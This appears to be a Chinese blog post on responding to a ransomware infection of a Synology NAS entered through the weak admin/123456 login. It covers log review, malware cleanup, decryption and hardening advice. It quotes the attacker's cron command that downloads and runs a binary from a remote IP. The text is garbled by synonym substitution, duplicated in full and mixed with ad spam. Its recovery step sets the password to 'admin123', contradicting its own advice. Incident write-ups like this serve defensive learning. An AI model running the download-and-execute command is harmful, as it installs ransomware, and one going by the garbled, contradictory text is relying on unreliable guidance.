记一次诓骗病毒后的应急呼应
弁言
群晖是一种NAS(网络从属存储)体系,在生存中主要扮演一局部公有云人物,可以将文件存储于 NAS,并经过网页欣赏器或手机使用步骤可完成存储和共享,同时还提供的丰厚使用以便利办理使用。借助群晖提供的 QuickConnect 快连办事,无需随身携带存储装备,即可以随时随地拜候NAS。由于这些优点,群晖屡屡被当做是NAS的首选。
但偏偏这次被上诓骗病毒了,经过材料查询发觉该病毒早在2019年宁静专家就以前分析过并已提供预警信息,一旦影响,此中的文件都市被加密,并经过留下的文件索要比特币。颠末开头推断是经过web界面的弱口令进入的,之后创建了一个定时职责从美国某个IP下载文件来实行下令,并经过诓骗病毒对文件举行了加密且暂且未发觉该病毒有横向举动。本文主要纪录群晖中诓骗病毒后的应急呼应历程。
2021最新整理网络宁静\浸透测试/宁静学习材料(全套视频、大厂面经、极品手册。必备东西包)眷注我,私信回复“材料”获取
一、打击流程
(一)获取打击目标
目标地点为http://x.x.x.x:5000,依据材料查询群晖的默许端口就是5000和5001,那么黑客应该是有针对性地经过批量扫描对公网上的IP地点的5000以及5001端口举行检测,假如扫描到为群晖体系,那么就纪录下去保存后果
(二)实行弱口令爆破
经过东西对目标站点的默许办理账号admin举行爆破,经过admin/123456爆破进入群晖NAS体系,并且黑客接纳了动态切换署理IP的办法来提升我们的溯源难度。
(三)植入诓骗病毒
以admin登录后便植入了诓骗病毒,加密硬盘数据(文件典范为encrypt)并留下了比特币付出地点。
二、应激流程
目标群晖体系版本的DSM为6.2.3-25426,CPU为INTEL Celeron J3455,在公网上没有已知毛病存在可以直接进入目标。
(一)修正暗码
既然晓得了入侵源头,那么先把弱口令修正掉,避免黑客再次经过弱口令登录,可以经过web体系界面或办事器这两种办法举行修正
(1)直接修正暗码
将暗码修正为强口令,最好启用2步调验证来提高宁静性
(2)在办事器中修正
1、在web界面开启22端口
2、经过ssh登录目标群晖的admin账户(admin为群晖的默许账户)
3、输入以下下令,直接切换为root权限
sudo su -
4、输入以下下令,修正暗码为admin123
synouser --setpw admin admin123
(二)日志分析
依据遇害公司的反应,他们是从7月29日发觉文件被加密,而到了8月3日才寻求武艺协助,那么经过群晖自带的日志中央可以发觉在7月28日夜晚11点19分有来自83.97.20.103经过登录admin账号
固然溯源这个IP并没有什么卵用,由于是外洋并已被标志为署理、扫描地点
经过日志查询还发觉打击者在7月28日19分还创建了定时职责
实行的具体下令如下,主要功效是进入/tmp目次下将crp_linux_386文件下载下去并赋予777权限输入为386,经过nohub永世实行386步骤且不输入任何信息到终端
cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386;chmod 0777 ./386;nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &
在微步上查询98.144.56.47,发觉已标识为诓骗步骤,数据解密的渴望以前十分渺茫
(三)病毒查杀
起首先将tmp目次下的386文件删除(但是未保存病毒原件,不克不及仔细分析该病毒,比力可惜),之后主要经过群晖自带的插件Antivirus Essential查察在群晖中对否留有病毒
(1)下载Antivirus Essential
(2)通盘扫描
(3)断绝病毒
(四)数据解密
这个太故意思了,在第一天访谈之后,老板去找了淘宝上的店家破解,我一开头以为淘宝的店家真的那么牛,这种加密的数据都能破解,厥后拜候了暗网的地点才发觉,淘宝店家直接出钱买了解密东西,直接净赚xxxx元。
复制一个加密文件经过下载的解密步骤实验举行解密,最初告捷解密。解密历程如下:
.\decryptor_windows_x86.exe -s C:\test\
三、防备办法
1、停用默许办理账号admin,新建一个不同的账号并分派办理权限
2、根绝弱口令,设置强口令,可参考等保要求中的长度八位以上,由数字、字母、特别字符构成
3、修正默许登录端口,可修正如10000+以上的端口
4、开启登录失败锁定,对多次登录失败的IP举行锁定
5、安装宁静东西(宁静参谋),定期更新补丁并晋级版本
6、启用防火墙,设置相差端正
7、文件版本回滚,能轻松将文件复原至影响前的形态,可以好效避免因影响诓骗病毒后文件无法拜候的情况
8、文件权限控制,在分享文件时设置拜候暗码、好效期等,并对文件权限举行控制
【网安材料获取】
四、总结
这是我第一次做应急呼应事情,约莫无论是对群辉体系照旧诓骗病毒都知之甚少,不免会有一些表明不清或认知不敷的场合。假如列位大佬另有其他更好的思绪,接待在批评区留言。
弁言
群晖是一种NAS(网络从属存储)体系,在生存中主要扮演一局部公有云人物,可以将文件存储于 NAS,并经过网页欣赏器或手机使用步骤可完成存储和共享,同时还提供的丰厚使用以便利办理使用。借助群晖提供的 QuickConnect 快连办事,无需随身携带存储装备,即可以随时随地拜候NAS。由于这些优点,群晖屡屡被当做是NAS的首选。
但偏偏这次被上诓骗病毒了,经过材料查询发觉该病毒早在2019年宁静专家就以前分析过并已提供预警信息,一旦影响,此中的文件都市被加密,并经过留下的文件索要比特币。颠末开头推断是经过web界面的弱口令进入的,之后创建了一个定时职责从美国某个IP下载文件来实行下令,并经过诓骗病毒对文件举行了加密且暂且未发觉该病毒有横向举动。本文主要纪录群晖中诓骗病毒后的应急呼应历程。
【网安材料获取】
一、打击流程
(一)获取打击目标
目标地点为http://x.x.x.x:5000,依据材料查询群晖的默许端口就是5000和5001,那么黑客应该是有针对性地经过批量扫描对公网上的IP地点的5000以及5001端口举行检测,假如扫描到为群晖体系,那么就纪录下去保存后果
(二)实行弱口令爆破
经过东西对目标站点的默许办理账号admin举行爆破,经过admin/123456爆破进入群晖NAS体系,并且黑客接纳了动态切换署理IP的办法来提升我们的溯源难度。
(三)植入诓骗病毒
以admin登录后便植入了诓骗病毒,加密硬盘数据(文件典范为encrypt)并留下了比特币付出地点。
二、应激流程
目标群晖体系版本的DSM为6.2.3-25426,CPU为INTEL Celeron J3455,在公网上没有已知毛病存在可以直接进入目标。
(一)修正暗码
既然晓得了入侵源头,那么先把弱口令修正掉,避免黑客再次经过弱口令登录,可以经过web体系界面或办事器这两种办法举行修正
(1)直接修正暗码
将暗码修正为强口令,最好启用2步调验证来提高宁静性
(2)在办事器中修正
1、在web界面开启22端口
2、经过ssh登录目标群晖的admin账户(admin为群晖的默许账户)
3、输入以下下令,直接切换为root权限
sudo su -
4、输入以下下令,修正暗码为admin123
synouser --setpw admin admin123
(二)日志分析
依据遇害公司的反应,他们是从7月29日发觉文件被加密,而到了8月3日才寻求武艺协助,那么经过群晖自带的日志中央可以发觉在7月28日夜晚11点19分有来自83.97.20.103经过登录admin账号
固然溯源这个IP并没有什么卵用,由于是外洋并已被标志为署理、扫描地点
经过日志查询还发觉打击者在7月28日19分还创建了定时职责
实行的具体下令如下,主要功效是进入/tmp目次下将crp_linux_386文件下载下去并赋予777权限输入为386,经过nohub永世实行386步骤且不输入任何信息到终端
cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386;chmod 0777 ./386;nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &
在微步上查询98.144.56.47,发觉已标识为诓骗步骤,数据解密的渴望以前十分渺茫
(三)病毒查杀
起首先将tmp目次下的386文件删除(但是未保存病毒原件,不克不及仔细分析该病毒,比力可惜),之后主要经过群晖自带的插件Antivirus Essential查察在群晖中对否留有病毒
(1)下载Antivirus Essential
(2)通盘扫描
(3)断绝病毒
(四)数据解密
这个太故意思了,在第一天访谈之后,老板去找了淘宝上的店家破解,我一开头以为淘宝的店家真的那么牛,这种加密的数据都能破解,厥后拜候了暗网的地点才发觉,淘宝店家直接出钱买了解密东西,直接净赚xxxx元。
复制一个加密文件经过下载的解密步骤实验举行解密,最初告捷解密。解密历程如下:
.\decryptor_windows_x86.exe -s C:\test\
三、防备办法
1、停用默许办理账号admin,新建一个不同的账号并分派办理权限
2、根绝弱口令,设置强口令,可参考等保要求中的长度八位以上,由数字、字母、特别字符构成
3、修正默许登录端口,可修正如10000+以上的端口
4、开启登录失败锁定,对多次登录失败的IP举行锁定
5、安装宁静东西(宁静参谋),定期更新补丁并晋级版本
6、启用防火墙,设置相差端正
7、文件版本回滚,能轻松将文件复原至影响前的形态,可以好效避免因影响诓骗病毒后文件无法拜候的情况
8、文件权限控制,在分享文件时设置拜候暗码、好效期等,并对文件权限举行控制
2021最新整理网络宁静\浸透测试/宁静学习材料(全套视频、大厂面经、极品手册。必备东西包)眷注我,私信回复“材料”获取
四、总结
这是我第一次做应急呼应事情,约莫无论是对群辉体系照旧诓骗病毒都知之甚少,不免会有一些表明不清或认知不敷的场合。假如列位大佬另有其他更好的思绪,接待在批评区留言。
